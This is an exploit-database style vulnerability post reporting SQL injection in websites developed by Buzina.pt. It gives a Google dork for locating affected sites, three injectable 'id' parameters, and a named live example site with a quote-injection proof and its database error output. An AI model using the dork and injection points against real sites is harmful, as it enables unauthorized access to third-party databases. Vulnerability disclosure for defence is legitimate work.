facebook facebook twitter rss

Developed By Buzina.pt Hosting Portugal SQL Injection

Author: KingSkrupellos , Published: 08-10-2018
################################################################################################

# Exploit Title : Developed By Buzina.pt Hosting Portugal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : buzina.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Developed By Buzina'' site:pt

# SQL Injection Exploit :

/categoria.php?id=[SQL Injection]

/projectos_single.php?id=[SQL Injection]

/categoria_single.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

factorprestigio.pt/categoria.php?id=12%27 => [ Proof of Concept ] => archive.is/aHt6P

# SQL Database Error =>

Deprecated: Function mysql_db_query() is deprecated in
/home/factorprestigio/public_html/categoria.php on line 26

Deprecated: mysql_db_query(): This function is deprecated; use mysql_query() instead in
/home/factorprestigio/public_html/categoria.php on line 26

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in
/home/factorprestigio/public_html/categoria.php on line 27

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :